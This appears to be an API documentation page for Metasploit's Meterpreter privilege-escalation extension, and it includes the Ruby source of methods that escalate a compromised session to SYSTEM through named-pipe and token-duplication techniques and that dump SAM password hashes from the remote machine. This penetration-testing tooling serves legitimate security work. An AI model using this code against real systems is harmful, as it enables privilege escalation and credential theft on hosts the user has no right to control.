Class: Rex::Post::Meterpreter::Extensions::Priv::Priv
- Inherits:
-
Rex::Post::Meterpreter::Extension
- Object
- Rex::Post::Meterpreter::Extension
- Rex::Post::Meterpreter::Extensions::Priv::Priv
- Defined in:
- lib/rex/post/meterpreter/extensions/priv/priv.rb
Overview
This meterpreter extensions a privilege escalation interface that is capable of doing things like dumping password hashes and performing local exploitation.
Constant Summary collapse
- TECHNIQUE =
{ any: 0, named_pipe: 1, named_pipe_2: 2, token_dup: 3, named_pipe_rpcss: 4, named_pipe_print_spooler: 5, named_pipe_efs: 6 }.freeze
Instance Attribute Summary collapse
-
#fs ⇒ Object
Modifying privileged file system attributes.
Attributes inherited from Rex::Post::Meterpreter::Extension
Class Method Summary collapse
Instance Method Summary collapse
-
#getsystem(technique = ) ⇒ Object
Attempt to elevate the meterpreter to Local SYSTEM.
-
#initialize(client) ⇒ Priv
constructor
Initializes the privilege escalation extension.
-
#sam_hashes ⇒ Object
Returns an array of SAM hashes from the remote machine.
Constructor Details
#initialize(client) ⇒ Priv
Initializes the privilege escalation extension.
40 41 42 43 44 45 46 47 48 49 50 51 52 53 |
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 40 def initialize(client) super(client, 'priv') client.register_extension_aliases( [ { 'name' => 'priv', 'ext' => self }, ]) # Initialize sub-classes self.fs = Fs.new(client) end |
Instance Attribute Details
#fs ⇒ Object
Modifying privileged file system attributes.
135 136 137 |
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 135 def fs @fs end |
Class Method Details
.extension_id ⇒ Object
23 24 25 |
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 23 def self.extension_id EXTENSION_ID_PRIV end |
Instance Method Details
#getsystem(technique = ) ⇒ Object
Attempt to elevate the meterpreter to Local SYSTEM
58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 |
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 58 def getsystem(technique=TECHNIQUE[:any]) request = Packet.create_request(COMMAND_ID_PRIV_ELEVATE_GETSYSTEM) # All three (that's #1, #2, #3 and *any* / #0) of the service-based techniques need a service name parameter if [TECHNIQUE[:any], TECHNIQUE[:named_pipe], TECHNIQUE[:named_pipe_2], TECHNIQUE[:token_dup]].include?(technique) request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_NAME, Rex::Text.rand_text_alpha_lower(6)) end # We only need the elevate DLL for when we're invoking the TokenDup or # NamedPipe2 method, which we'll only use if required (ie. trying all or # when that method is asked for explicitly) if [TECHNIQUE[:any], TECHNIQUE[:named_pipe_2], TECHNIQUE[:token_dup]].include?(technique) elevator_path = nil client.binary_suffix.each { |s| elevator_path = MetasploitPayloads.meterpreter_path('elevator', s) if !elevator_path.nil? break end } if elevator_path.nil? elevators = '' client.binary_suffix.each { |s| elevators << "elevator.#{s}, " } raise RuntimeError, "#{elevators.chomp(', ')} not found", caller end elevator_data = '' ::File.open(elevator_path, 'rb') { |f| elevator_data += f.read(f.stat.size) } request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data) request.add_tlv(TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length) end request.add_tlv(TLV_TYPE_ELEVATE_TECHNIQUE, technique) # as some service routines can be slow we bump up the timeout to 90 seconds response = client.send_request(request, 90) technique = response.get_tlv_value(TLV_TYPE_ELEVATE_TECHNIQUE) if(response.result == 0 and technique != nil) client.core.use('stdapi') if not client.ext.aliases.include?('stdapi') client.update_session_info client.sys.config.getprivs if client.framework.db and client.framework.db.active client.framework.db.report_note( :host => client.sock.peerhost, :workspace => client.framework.db.workspace, :type => 'meterpreter.getsystem', :data => {:technique => technique} ) rescue nil end return [ true, technique ] end return [ false, 0 ] end |
#sam_hashes ⇒ Object
Returns an array of SAM hashes from the remote machine.
123 124 125 126 127 128 129 130 |
# File 'lib/rex/post/meterpreter/extensions/priv/priv.rb', line 123 def sam_hashes # This can take a long long time for large domain controls, bump the timeout to one hour response = client.send_request(Packet.create_request(COMMAND_ID_PRIV_PASSWD_GET_SAM_HASHES), 3600) response.get_tlv_value(TLV_TYPE_SAM_HASHES).split(/\n/).map { |hash| SamUser.new(hash) } end |